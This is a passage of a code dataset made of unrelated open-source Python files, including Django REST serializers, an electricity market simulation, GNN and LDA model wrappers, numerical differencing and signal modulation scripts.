completed\n new_achievements_completed = True\n # Create string with achievement descriptions as new lines\n achievement_text = '\\n'.join(map(str, new_achievements))\n # Inform about new achievements\n update.message.reply_text(\n text='Congratulation {}, you earned the following achievements: \\n{}'.\n format(\n student.get_name(),\n achievement_text),\n quote=False)\n # Send goodbye depending on new achievements being completed\n if new_achievements_completed:\n update.message.reply_text(\n text=\"Those were all new achievements.\", quote=False)\n else:\n update.message.reply_text(\n text=\"I found no new achievements.\", quote=False)\n\n remove_sentence_correction_task_of_group(get_group_chat_id(update))\n\n # Remove the room manager\n remove_room_manager_of_group(get_group_chat_id(update))\n # Send goodbye\n update.message.reply_text(\n text='Goodbye. To start again write /start.', quote=False)\n\n # Return end state\n return state.SEN_CORR_STOP\n","repo_name":"ALLUOS/ALLUOS_PUBLIC_APP","sub_path":"src/bot/handler/task/sen_corr_handler.py","file_name":"sen_corr_handler.py","file_ext":"py","file_size_in_byte":22711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9626566208","text":"__author__ = 'Dudu'\n\nfrom django.forms import widgets\nfrom rest_framework import serializers\nfrom app.models import Mandado, Oficial, Telefone, Diligencia, Tipo_Diligencia,\\\n Estatus_Cumprimento, Foto, Audio, Vara, Comarca, Ordem, Version\nfrom django.contrib.auth.models import User, Group\nfrom rest_framework_bulk import (\n BulkListSerializer,\n BulkSerializerMixin,\n ListBulkCreateUpdateDestroyAPIView,\n)\n\n\nclass MandadoSerializer(BulkSerializerMixin, serializers.ModelSerializer):\n oficial = serializers.ReadOnlyField(source='oficial.usuario.username')\n\n class Meta:\n model = Mandado\n list_serializer_class = BulkListSerializer\n fields = (\n 'id',\n 'comarca',#\n 'vara',#\n 'processo',#\n 'destinatario',#\n 'cep',#\n 'rua',#\n 'numero',#\n 'bairro',#\n 'cidade',#\n 'estado',#\n 'pais',#\n 'latitude',#\n 'longitude',#\n 'endereco_ERRO',#\n 'verificado_em_loco',#\n 'complemento',#\n 'endereco_nao_mora',#\n 'endereco_ERRO',#\n 'verificado_em_loco',#\n 'complemento',#\n 'ajustado_mapa',#\n 'endereco_nao_mora',#\n 'numero_mandado',#\n 'ano_mandado',#\n 'codigo_mandado',#\n 'data',#\n 'oficial',#\n 'ordem',#\n 'audiencia',#\n 'conducao',#\n 'status_cumprimento',#\n 'cumprimento',#\n 'cor_urgencia',#\n 'rota',#\n 'owner',#\n )\n\n\nclass OficialSerializer(serializers.ModelSerializer):\n mandados = serializers.PrimaryKeyRelatedField(many=True, queryset=Mandado.objects.all())\n class Meta:\n model = Oficial\n fields = (\n 'id',\n 'usuario',\n 'telefone',\n 'email',\n 'cpf',\n 'comarca',\n 'mandados',\n )\n\n'''\nclass CepSerializer(serializers.ModelSerializer):\n class Meta:\n model = CEP\n fields = (\n 'id',\n 'cep',\n 'rua',\n 'bairro',\n 'cidade',\n 'estado',\n 'pais',\n 'latitude',\n 'longitude',\n 'ajustado_mapa'\n )\n\n'''\nclass TelefoneSerializer(serializers.ModelSerializer):\n class Meta:\n model = Telefone\n fields = (\n 'id',\n 'ddd',\n 'telefone',\n 'mandado',\n )\n\n'''\nclass EnderecoSerializer(serializers.ModelSerializer):\n cep_str = serializers.CharField(source='cep', read_only=True)\n class Meta:\n model = Endereco\n fields = (\n 'id',\n 'cep',\n 'cep_str',\n 'numero',\n 'latitude',\n 'longitude',\n 'endereco_ERRO',\n 'verificado_em_loco',\n 'complemento',\n )\n'''\n\nclass DiligenciaSerializer(serializers.ModelSerializer):\n class Meta:\n model = Diligencia\n fields = (\n 'id',\n 'mandado',\n 'data_diligencia',\n 'hora_diligencia',\n 'tipo_diligencia',\n 'latitude',\n 'longitude',\n 'data_agendamento',\n 'hora_agendamento',\n 'documento',\n 'editar_documento',\n )\n\n\nclass Tipo_DiligenciaSerializer(serializers.ModelSerializer):\n class Meta:\n model = Tipo_Diligencia\n fields = (\n 'id',\n 'nome',\n 'descricao',\n 'modelo_documento',\n 'estatus_cumprimento',\n 'diligencia_positiva',\n 'diligencia_parcial',\n 'diligencia_negativa',\n 'diligencia_nao_cumprida',\n 'diligencia_cumprida',\n 'endereco_ERRO',\n 'diligencia_nao_mora',\n 'verificado_em_loco',\n 'diligencia_externa',\n 'diligencia_coletiva',\n )\n\n\nclass Estatus_CumprimetoSerializer(serializers.ModelSerializer):\n class Meta:\n model = Estatus_Cumprimento\n fields = (\n 'id',\n 'estatus_cumprimento',\n 'descricao',\n 'exibir_mapa',\n 'cumprimento',\n )\n\n\nclass OrdemSerializer(serializers.ModelSerializer):\n class Meta:\n model = Ordem\n fields = (\n 'id',\n 'ordem',\n 'descricao',\n 'diligencia_positiva',\n )\n\n\nclass ComarcaSerializer(serializers.ModelSerializer):\n class Meta:\n model = Comarca\n fields = (\n 'id',\n 'nome',\n 'cod_comarca',\n 'endereco',\n )\n\n\nclass VaraSerializer(serializers.ModelSerializer):\n class Meta:\n model = Vara\n fields = (\n 'nome',\n 'comarca',\n )\n\n\nclass FotoSerializer(serializers.ModelSerializer):\n class Meta:\n model = Foto\n fields = (\n 'diligencia',\n 'descricao',\n 'foto',\n )\n\n\nclass AudioSerializer(serializers.ModelSerializer):\n class Meta:\n model = Audio\n fields = (\n 'diligencia',\n 'descricao',\n 'audio',\n )\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n snippets = serializers.HyperlinkedRelatedField(many=True, view_name='snippet-detail', read_only=True)\n\n class Meta:\n model = User\n fields = ('id','url', 'username', 'first_name', 'last_name', 'is_staff', 'is_active', 'is_superuser', 'snippets', 'password', 'email')\n\n def create(self, validated_data):\n # colocar aqui as configurações do usuario que quero, ver a parte dos grupos e fazer oficial sempre\n user = super(UserSerializer, self).create(validated_data)\n user.set_password(validated_data['password'])\n user.is_active = True\n user.is_staff = True\n user.is_superuser = False\n user.groups.set([Group.objects.get(name='Oficial'),])\n\n user.save()\n return user\n\nclass VersionSerializer(serializers.ModelSerializer):\n class Meta:\n model = Version\n fields = (\n 'id',\n 'versao',\n 'status',\n )","repo_name":"dududrauto/my-first-blog","sub_path":"app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":6296,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1554201693","text":"#!/usr/bin/env python3\n# --------------------------------------------\n# marketplace.py\n# Author: Jacob Santelli and Ian Murray\n# --------------------------------------------\n\nimport pandas as pd\nimport numpy as np\n\n\n# takes a list of portfolio panda objects, returns them appended to one another\ndef append(portList):\n df = portList[0]\n for port in portList[1:]:\n {df.append(port)}\n return df\n\n\ndef portSort(portFrame):\n portFrame.sort_values(\"price\")\n\n\ndef sampleDemand(mean_demand, sd=0.03):\n pass\n\n\ndef calcRevenue(df, price):\n df['revenue'] = df['is_generating'] * \\\n (df['mw'] * \\\n (price - \\\n df['fuelcost'] - df['varom'] - df['carbon']))\n \n\n# ------------ SINGLE ITERATION ---------------\n# 1. Portfolios send prices\n# 2. All supply sorted and creates supply curve\n# 3. Demand sampled and inelastic demand intersects with supply curve at marginal price\n# 4. For generating plants, return money back to portfolio based on supply they satisfied and inframarginal rents\n\n\ndef main():\n portfolios_data = pd.read_csv(\"./generator_info.csv\")\n # Drop missing values\n portfolios_data.dropna(inplace=True)\n portfolios_data[\"is_generating\"] = False\n portfolios_data[\"price\"] = np.random.randint(1, 6, size=portfolios_data.shape[0])\n\n simulate_hour(10800, portfolios_data)\n\n\ndef sample_demand(mu, sd=0.03):\n return np.random.normal(loc=mu, scale=sd)\n\n\ndef set_price_by_id(data, id, price):\n data_copy = data.copy()\n data_copy.loc[data_copy[\"id\"] == id, (\"price\")] = price\n return data_copy\n\n\ndef get_ids_of_portfolios(data, portfolio):\n data_copy = data.copy()\n return data_copy.loc[data_copy[\"portfolio\"] == portfolio, (\"id\")]\n\n\ndef simulate_hour(mean_demand, generator_data):\n sampled_demand = sample_demand(mean_demand)\n data_copy = generator_data.copy()\n data_copy[\"revenue\"] = 0\n\n # Sort data by price\n data_copy.sort_values(\"price\", ascending=True, inplace=True)\n\n # Get cumulative demand\n # data_copy['cumulative_capacity'] = data_copy.loc[:, ('mw')].cumsum()\n\n templist = data_copy.loc[:, (\"mw\")].cumsum()\n data_copy[\"cumulative_capacity\"] = templist\n\n # Get energy price for this hour\n data_copy[\"is_generating\"] = data_copy[\"cumulative_capacity\"] < sampled_demand\n\n # Marginal generator - need to cover entire demand (perfectly inelastic), so add final generator\n marg_gen_index = data_copy.loc[~data_copy[\"is_generating\"], :].index.values.tolist()[0]\n # (also set is_generating true for marg gen)\n data_copy.loc[data_copy.index == marg_gen_index, 'is_generating'] = True\n # Hour price\n hour_price = data_copy[data_copy.index == marg_gen_index]['price']\n \n # Get revenues of entire dataframe\n \n # If is_generating True, then calculate revenue on these\n return {'hour_price': hour_price, 'dataframe': data_copy.loc[data_copy['is_generating'], :]}\n\n\ndef sandbox():\n df = pd.DataFrame()\n\n portfolio_1 = {\"X\": 69.00, \"Y\": 500.00}\n # price of generating unit with ID X from portfolio 1\n portfolio_1[\"X\"]\n\n# set all of the generators from portfolio port\n# to a price defined by some arbitrary function\n# price_func by passing all relevant parameters\ndef set_portfolio_prices(data, price_func, port):\n data_copy = data.copy()\n list_of_ids = get_ids_of_portfolios(data_copy, port)\n\n for id in data_copy:\n if id in list_of_ids:\n data_copy[data_copy['id'] == id]['price'] = \\\n price_func(data_copy[data_copy['id'] == id]['mw'],\n data_copy[data_copy['id'] == id]['varom'],\n data_copy[data_copy['id'] == id]['carbon'],\n data_copy[data_copy['id'] == id]['varom'],\n data_copy[data_copy['id'] == id]['fixom'],\n )\n \n \n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jacob-santelli/ene422","sub_path":"marketplace.py","file_name":"marketplace.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27661047040","text":"from .model_wrapper import ModelWrapper\n#from models.PPGN_variants import new_data_format\nfrom models.PPGN import PPGN, CV_regression, param_search, CV_10\nfrom dataclasses import dataclass\nimport torch\n\nclass PPGNNewDataFormatWrapper(ModelWrapper):\n \n LEARNING_RATES = {'AIDS': 0.0001, 'COLLAB': 0.0001, 'IMDB-BINARY': 0.00005, 'IMDB-MULTI': 0.0001, 'MUTAG': 0.0001, 'NCI1':0.0001, 'NCI109':0.0001, 'PROTEINS': 0.001, 'PTC_FM': 0.0001, 'QM9': 0.0001}\n DECAY_RATES = {'AIDS': 1.0, 'COLLAB': 0.5, 'IMDB-BINARY': 0.5, 'IMDB-MULTI': 0.75, 'MUTAG': 1.0, 'NCI1':0.75, 'NCI109':0.75, 'PROTEINS': 0.5, 'PTC_FM': 1.0, 'QM9': 0.8}\n EPOCHS = {'AIDS': 500, 'COLLAB': 150, 'IMDB-BINARY': 100, 'IMDB-MULTI': 150, 'MUTAG': 500, 'NCI1': 200, 'NCI109': 250, 'PROTEINS': 100, 'PTC_FM': 400, 'QM9': 500}\n \n @dataclass\n class Config:\n lr = 0.0001\n decay = 0.5\n epochs = 100\n print_freq = 20\n batch_size = 64\n param_search = False\n verbose = False\n block_feat = 400\n num_blocks = 3\n depth = 2\n new_suffix = True\n version = 1\n \n config = Config()\n \n def __init__(self, dataset, config):\n if dataset in self.LEARNING_RATES:\n self.config.lr = self.LEARNING_RATES[dataset]\n self.config.decay = self.DECAY_RATES[dataset]\n self.config.epochs = self.EPOCHS[dataset]\n super(PPGNNewDataFormatWrapper, self).__init__(dataset, config)\n self.config.qm9 = self.qm9\n\n X, y = self.data[0]\n if self.config.qm9:\n self.config.input_size = X.shape[0]\n self.config.output_size = y.shape[1]\n else:\n self.config.input_size = X.shape[0]\n self.config.output_size = self.data.num_classes\n\n self.model = PPGN\n \n # transform a torch_geometric.data.Data object to the matrix needed for PPGNNewData-style models and *graph label*\n def transform_data(self, data):\n return self.transform(data)\n \n def run(self):\n # For now, we won't allow param search on qm9\n if self.qm9:\n accuracy = CV_regression(self.model, self.data, self.config)\n elif self.config.param_search:\n lr, decay, accuracy = param_search(self.model, self.data, self.config)\n print(f'\\nPARAMETER SEARCH COMPLETE. ACHIEVED BEST ACCURACY OF {accuracy} with lr={lr}, decay={decay}')\n else:\n accuracy = CV_10(self.model, self.data, self.config)\n return accuracy\n \n def transform(self, data):\n version = self.config.version\n if version == 3:\n return self.transformV3(data)\n num_nodes = data.num_nodes\n node_feats = data.x\n if node_feats is None:\n node_feats = torch.zeros((num_nodes, 1))\n num_node_feats = len(node_feats[0])\n edge_feats = data.edge_attr\n if edge_feats is None:\n edge_feats = torch.zeros((len(data.edge_index[0]), num_node_feats))\n edge_feats[:,0] = 1\n num_edge_feats = num_node_feats\n else:\n num_edge_feats = len(edge_feats[0])\n if num_edge_feats < num_node_feats:\n max_dim = num_node_feats\n diff = num_node_feats - num_edge_feats\n # Fill out edge_feats with extra dims\n edge_feats = torch.stack([torch.cat((e, torch.zeros(diff))) for e in edge_feats])\n elif num_node_feats < num_edge_feats:\n max_dim = num_edge_feats\n diff = num_edge_feats - num_node_feats\n node_feats = torch.stack([torch.cat((v, torch.zeros(diff))) for v in node_feats])\n else:\n max_dim = num_node_feats\n \n if version == 2:\n max_dim += 1\n \n mat = torch.zeros(num_nodes, num_nodes, max_dim)\n for edge_feat, v1, v2 in zip(edge_feats, data.edge_index[0], data.edge_index[1]):\n if version == 2:\n mat[v1][v2][0] = 1\n mat[v1][v2][1:] = edge_feat\n else:\n mat[v1][v2] = edge_feat\n \n for v1, node_feat in enumerate(node_feats):\n if version == 2:\n mat[v1][v1][1:] = node_feat\n else:\n mat[v1][v1] = node_feat\n \n y = data.y.squeeze()\n if y.dim() == 0 or len(y) == 1:\n y = int(y)\n return (mat.transpose(0, 1).transpose(0,2), y)\n \n def transformV3(self, data):\n num_nodes = data.num_nodes\n node_feats = data.x\n if node_feats is None:\n #node_feats = torch.zeros((num_nodes, 1))\n node_feats = []\n num_node_feats = 0\n else:\n num_node_feats = len(node_feats[0])\n num_aug_nodes = num_nodes + num_node_feats\n mat = torch.zeros(num_aug_nodes, num_aug_nodes, 1)\n for v1, v2 in zip(data.edge_index[0], data.edge_index[1]):\n mat[v1][v2] = torch.tensor([1])\n for v, node_feat in enumerate(node_feats):\n mat[v][num_nodes:] = node_feat.unsqueeze(1)\n \n y = data.y.squeeze()\n if y.dim() == 0 or len(y) == 1:\n y = int(y)\n return (mat.transpose(0, 1).transpose(0,2), y)\n","repo_name":"nathanlucaussy/provably-powerful-GNNs","sub_path":"model_wrappers/PPGN_new_data_format_wrapper.py","file_name":"PPGN_new_data_format_wrapper.py","file_ext":"py","file_size_in_byte":5223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74836895093","text":"import os\nimport argparse\n\nimport pandas as pd\nfrom tqdm import tqdm\n\n\ndef preprocessing(BASE_PATH, SAVE_PATH):\n question_lists, answer_lists = [], []\n all_data = []\n for fn in os.listdir(BASE_PATH):\n if os.path.splitext(fn)[-1] != '.xlsx':\n continue\n print(fn)\n data = pd.read_excel(os.path.join(BASE_PATH, fn))\n all_sentence, id_list = [], []\n for sentence, speaker_id in tqdm(zip(data[\"SENTENCE\"], data[\"SPEAKERID\"]), total=len(data)):\n all_sentence.append(str(sentence))\n id_list.append(speaker_id)\n\n questions, answers = [], []\n i = 0\n while i < len(all_sentence):\n end = i + 1\n _id = id_list[i]\n if end >= len(all_sentence):\n break\n while end < len(all_sentence) and id_list[end] == _id:\n end += 1\n if _id == 1:\n try:\n questions.append(\" \".join(all_sentence[i:end]) + \"\")\n except:\n print(i, end)\n break\n else:\n answers.append(\" \".join(all_sentence[i:end]) + \"\")\n i = end\n min_length = min(len(questions), len(answers))\n question_lists.extend(questions[:min_length])\n answer_lists.extend(answers[:min_length])\n for i in range(min_length):\n all_data.append(questions[i])\n all_data.append(answers[i])\n\n with open(SAVE_PATH, 'wt', encoding='utf-8') as f:\n for line in all_data:\n f.write(line + \"\\n\")\n\n\ndef main():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--data_dir', required=True,\n help=\"Your Data Directory Path\")\n parser.add_argument('--save_file', required=True,\n help=\"Save path extension : '.txt'\")\n\n args = parser.parse_args()\n\n DATA_PATH = args.data_dir\n SAVE_PATH = args.save_file\n\n preprocessing(DATA_PATH, SAVE_PATH)\n\n\nif __name__==\"__main__\":\n main()","repo_name":"pellto/comcom_online_task","sub_path":"finetune_code/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73378043251","text":"import math\nfrom typing import List\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom captum.attr import IntegratedGradients\n\nfrom scce.model.dataset import InputDataProcessingHelper\nfrom scce.model.net import load_network\n\n\ndef integrated_gradients(\n model_file, RNA_values: List[np.array], gene_names: List[str]\n) -> pd.DataFrame:\n checkpoint, model = load_network(model_file)\n model.cuda()\n model.eval()\n ig = IntegratedGradients(model)\n\n input_raw_length, kernel_size, input_size, output_size = (\n checkpoint[\"input_raw_length\"],\n checkpoint[\"kernel_size\"],\n checkpoint[\"input_size\"],\n checkpoint[\"output_size\"],\n )\n helper = InputDataProcessingHelper(input_raw_length, kernel_size)\n\n scores = torch.zeros(math.prod(input_size))\n for RNA_value in RNA_values:\n input = helper.do(RNA_value.copy())\n input = torch.Tensor(input).cuda().unsqueeze(0).unsqueeze(0)\n\n for i in range(output_size):\n attributions = ig.attribute(input, target=(0, i))[0, 0].reshape(-1)\n scores += attributions.cpu().detach()\n\n scores = pd.DataFrame(scores, index=gene_names[: len(scores)], columns=[\"score\"])\n return scores\n","repo_name":"LMH0066/SEE","sub_path":"scce/analyse/attribution.py","file_name":"attribution.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26990282090","text":"import re\r\nn = int(input())\r\npatern = r\"^[+-.]?[0-9]*\\.[0-9]+$\"\r\n\"\"\"^ use for start with\r\n[] for set of \r\n? for zero and one occurrance\r\n* for one or more occurrance \r\n\\ for special character \r\n+ use for match\r\n$ use for end with\"\"\"\r\n\r\nfor i in range(n):\r\n value = input()\r\n print(bool(re.match(patern, value)))","repo_name":"durgeshbhargava/INNOMATICS_DataScience_Internship","sub_path":"Task - 5 (RegEx)/5.1 Detect Floating Point Number.py","file_name":"5.1 Detect Floating Point Number.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1832008751","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom pyper import R\nimport os\nfrom PreProcess import processTweet, is_ascii\n\n\nclass supervisedLDA:\n\n def __init__(self, dataFileName, alpha=1.0, numtopics=5, eta=0.1, logistic=True, lamda=1.0, e_iter=10, m_iter=4, variance=0.25, cutoff=0.25):\n model_filename = 'model_%s.RDS' % dataFileName\n vocab_filename = 'vocabulary_%s.RDS' % dataFileName\n fullpath = os.path.realpath(__file__)\n (path, files) = os.path.split(fullpath)\n self.path = path\n self.params = {\n 'numtopics': numtopics,\n 'alpha': alpha,\n 'eta': eta,\n 'logistic': logistic,\n 'lambda': lamda,\n 'e_iter': e_iter,\n 'm_iter': m_iter,\n 'variance': variance,\n 'OutputName': dataFileName,\n 'model_filename': model_filename,\n 'vocab_filename': vocab_filename,\n 'test_cutoff': cutoff,\n }\n self.r = R(use_pandas=True, use_numpy=True)\n self.assign_R_params()\n\n def set_param(self, param_name, param_value):\n self.params[param_name] = param_value\n\n def get_params(self, deep=False):\n return self.params\n\n def assign_R_params(self):\n for (key, value) in self.params.iteritems():\n self.r.assign(key, value)\n\n def fit(self, documents, labels):\n (documents, labels) = self.transform(documents, labels)\n self.r.assign('documents', documents)\n self.r.assign('labels', labels)\n self.r.run('source(\"trainLDA.R\")')\n vocab = self.r['vocabulary']\n self.set_param('vocabulary', vocab)\n self.assign_R_params()\n\n def transform(self, documents, labels):\n documents = [(tweet if is_ascii(tweet) else ' ') for tweet in\n documents]\n documents = map(lambda x: processTweet(x), documents)\n documents = map(lambda x: str(x).translate(None, '\"'),\n documents)\n (tweets_filtered, labels_filtered) = ([], [])\n for (tweet, label) in zip(documents, labels):\n if len(tweet) > 1:\n tweets_filtered.append(tweet)\n labels_filtered.append(label)\n return (tweets_filtered, labels_filtered)\n\n def test_transform(self, documents):\n documents = [(tweet if is_ascii(tweet) else ' ') for tweet in\n documents]\n documents = map(lambda x: processTweet(x), documents)\n documents = map(lambda x: str(x).translate(None, '\"'),\n documents)\n tweets_filtered = []\n for tweet in documents:\n if len(tweet) > 1:\n tweets_filtered.append(tweet)\n return tweets_filtered\n\n def __str__(self):\n return 'sLDA(cut:%s)' % self.params['test_cutoff']\n\n def predict(self, documents, gold_labels):\n (documents, gold_labels) = self.transform(documents,\n gold_labels)\n self.r.assign('testDocuments', documents)\n self.r.run('source(\"testLDA.R\")')\n predictions = self.r['pred']\n cutoff = self.params['test_cutoff']\n predictions = map(lambda x: int(x > cutoff), predictions)\n return (predictions, gold_labels)\n\n def save_model(self):\n self.r.run('source(\"%s/saveModel.R\")' % self.path)\n\n def load_model(self):\n self.r.run('source(\"%s/loadModel.R\")' % self.path)\n vocab = self.r['vocab']\n topics = self.r['topics']\n self.set_param('vocab', vocab)\n self.set_param('topics', topics)\n self.assign_R_params()\n","repo_name":"dssg/tweedr","sub_path":"tweedr/ml/pyslda/PySLDA.py","file_name":"PySLDA.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"21"} +{"seq_id":"4049564141","text":"# 1. Use the import statement to import a built-in package in Python. 2. Use the import statement to call a function present in another Python file.\nimport json\nfrom Python.employee import details, employee_name, age, title\n\ndef create_dict(name, age, title):\n employee_dict = {\n \"first_name\": str(name),\n \"age\" : int(age),\n \"title\" : str(title)\n }\n json_obj = json.dumps(employee_dict)\n return employee_dict\n\ndef write_json_to_file(json_obj, output_file):\n newfile = open(output_file, 'w')\n newfile.write(str(json_obj))\n newfile.close()\n return","repo_name":"tgilly93/BEND_Coursera","sub_path":"Python/imports.py","file_name":"imports.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13310946139","text":"import numpy as np\r\n\r\nfin = './exercise_2_input.dat' # Input file name\r\n\r\ny = np.loadtxt(fin) # Read data from file into NumPy array named data\r\n\r\n# Set some parameters\r\ndx = 2.0 # Data spacing\r\nnx = len(y) # Determines number of data points\r\n\r\nwave_length = 200.0\r\nk = 2*np.pi/wave_length # Wavenumber\r\nx = dx*np.arange(0,nx) # X values for calculating analytic derivative\r\nanalytic = -(k**2)*np.sin(k*x) # Analytic derivative\r\n\r\nsecond = np.zeros_like(analytic) # forward\r\nsecond.fill(None)\r\nfourth = np.copy(second) # fourth-order\r\n\r\n#Calculate standard difference\r\nfor i in range(1, nx-1): # Note: n starts at 1, not 0\r\n second[i] = (y[i+1]+y[i-1]-2*y[i])/(dx**2)\r\n\r\n#Calculate fourth-order difference\r\nfor i in range(2, nx-2):\r\n fourth[i] = (1/dx**2)*(((4/3)*(y[i+1] + y[i-1])) - ((1/12) * (y[i+2] + y[i-2])) - ((5/2) * y[i]))\r\n\r\n# Print results\r\ns = '{0:3s} {1:12s} {2:12s} {3:12s}'.format(' ', ' analytic',' second', ' fourth')\r\nprint(s)\r\nfor i, a in enumerate(analytic):\r\n s = '{0:3d} {1:12.9f} {2:12.9f} {3:12.9f}'.format(i,a,second[i],fourth[i])\r\n print(s)","repo_name":"unCl0ud/ESCI445","sub_path":"2/2-2.py","file_name":"2-2.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1552162592","text":"import json\nimport sys\nimport os\nfrom collections import defaultdict\nfrom itertools import combinations\nfrom operator import add\nfrom mrjob.job import MRJob\n\nclass TitleIndex(MRJob):\n def mapper(self, _, line):\n \n self.increment_counter('posts', 'count', 1)\n \n text_term_counts = defaultdict(int)\n \n post = json.loads(line.strip())\n post_id = int(post['id'])\n title_bigrams = post['title_bigrams']\n \n for bigram in title_bigrams:\n text_term_counts[' '.join(sorted(bigram))] += 1\n \n for (term, tf) in text_term_counts.iteritems():\n yield (term, post_id)\n \n def combiner(self, term, values):\n yield (term, [post_id[0] for post_id in values])\n \n \n def reducer(self, term, values):\n self.increment_counter('title_bigrams', 'count', 1)\n yield (term, [post_id for post_id in values])\n \n \nif __name__ == '__main__':\n TitleIndex.run()\n","repo_name":"rottentomato56/kaggle-fb-stackoverflow","sub_path":"Final/title_term_index.py","file_name":"title_term_index.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14434997609","text":"import pyttsx3\r\nimport PyPDF2\r\nbook = open('pdf path','rb')\r\npdfReader =PyPDF2.PdfFileReader(book)\r\npages = pdfReader.numPages\r\n#print('pages') to print number of pages in pdf\r\nspeaker =pyttsx3.init()\r\nfor num in range(0,pages):\r\n pa = pdfReader.getPage(num)\r\n text = pa.extractText()\r\n speaker.say(text)\r\n speaker.runAndWait()\r\n","repo_name":"Manoj-3868/python-projects","sub_path":"pdftoaudiobook/pdftoaudiobook.py","file_name":"pdftoaudiobook.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33631668900","text":"from rest_framework import generics\nfrom rest_framework.exceptions import APIException\nfrom rest_framework.views import status\nfrom django_filters import rest_framework as filters\nfrom django.db.models import QuerySet\nfrom .models import Suit, Price\nfrom .serializers import SuitSerializer\nfrom .filters import SuitFilter\n\n\nclass BadRequest(APIException):\n status_code = status.HTTP_400_BAD_REQUEST\n default_detail = 'Bad request'\n default_code = 'bad_request'\n\n def __init__(self, description=None, *args, **kwargs):\n if description is not None:\n self.default_detail = description\n super().__init__()\n\n\nclass ListSuitsView(generics.ListAPIView):\n filter_backends = (filters.DjangoFilterBackend,)\n filter_class = SuitFilter\n \"\"\"\n Provides a get method handler.\n \"\"\"\n queryset = Suit.objects.all()\n serializer_class = SuitSerializer\n\n @staticmethod\n def is_filtering_by_currency(currency, min_price, max_price):\n if currency and not min_price and not max_price:\n suit_ids: QuerySet = Price.objects.filter(currency=currency).values_list('suit_id', flat=True)\n return Suit.objects.filter(url__in=suit_ids)\n\n def get_queryset(self):\n \"\"\"\n This view should return a list of all the suits\n currency filter, min_price and max price are handled manually because are custom,\n they manage the prices nested serializer, see serializer.py also.\n \"\"\"\n currency = self.request.query_params.get('currency')\n min_price = self.request.query_params.get('min_price')\n max_price = self.request.query_params.get('max_price')\n\n self.is_filtering_by_currency(currency, min_price, max_price)\n\n if min_price or max_price:\n if not currency:\n raise BadRequest('min_price and max_price filters require currency query parameter to be specified')\n\n if min_price and not max_price:\n suit_ids: QuerySet = Price.objects.filter(\n currency=currency,\n amount__gte=min_price\n ).values_list('suit_id', flat=True)\n\n return Suit.objects.filter(url__in=suit_ids)\n elif max_price and not min_price:\n suit_ids: QuerySet = Price.objects.filter(\n currency=currency,\n amount__lte=max_price\n ).values_list('suit_id', flat=True)\n\n return Suit.objects.filter(url__in=suit_ids)\n elif min_price and max_price:\n suit_ids: QuerySet = Price.objects.filter(\n currency=currency,\n amount__gte=min_price,\n amount__lte=max_price\n ).values_list('suit_id', flat=True)\n\n return Suit.objects.filter(url__in=suit_ids)\n\n if currency:\n suit_ids: QuerySet = Price.objects.filter(currency=currency).values_list('suit_id', flat=True)\n return Suit.objects.filter(url__in=suit_ids)\n\n return Suit.objects.all()\n","repo_name":"lucaronca/suits-api","sub_path":"apps/scraped_suits/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73593888374","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef gera_bitstream(tamanho):\n return np.random.randint(2, size=tamanho)\n\ndef gera_sinal_ASK(T, snr, fc, fb_ASK):\n fs = 20 * fc\n t = np.arange(0, T, 1 / fs)\n Nb_ASK = int(fb_ASK * T)\n m_ASK = gera_bitstream(Nb_ASK)\n m_ASKp = np.repeat(m_ASK, int(fs / fb_ASK)) \n z_ASK = m_ASKp * np.exp(1j * 2 * np.pi * fc * t)\n z_ASK_noise = adiciona_ruido(z_ASK, snr)\n return t, m_ASKp, z_ASK_noise, m_ASK\n\ndef adiciona_ruido(sinal, snr):\n SNR_dB = snr\n noise_power = 10 ** (-SNR_dB / 10)\n noise_real = np.sqrt(noise_power / 2) * np.random.normal(0, 1, len(sinal))\n noise_imag = np.sqrt(noise_power / 2) * np.random.normal(0, 1, len(sinal))\n return sinal + noise_real + (1j * noise_imag)\n\ndef intdump(x, factor):\n return x[::factor]\n\ndef recupera_sinal_ASK(t, sinal_modulado, fc, fb_ASK, fs):\n m_ASKp_r = sinal_modulado * np.exp(-1j * 2 * np.pi * fc * t)\n n_samp = int(fs / fb_ASK)\n m_ASK_r = np.round(intdump(m_ASKp_r, n_samp))\n return m_ASK_r\n\ndef calcula_BER(sinal_original, sinal_recuperado):\n bit_errors = np.sum(np.abs(sinal_original - sinal_recuperado))\n BER = bit_errors / len(m_ASK)\n return BER\n\ndef plota_sinais_tempo(t, sinal_baseband, sinal_modulado):\n plt.figure(1)\n plt.subplot(2, 1, 1)\n 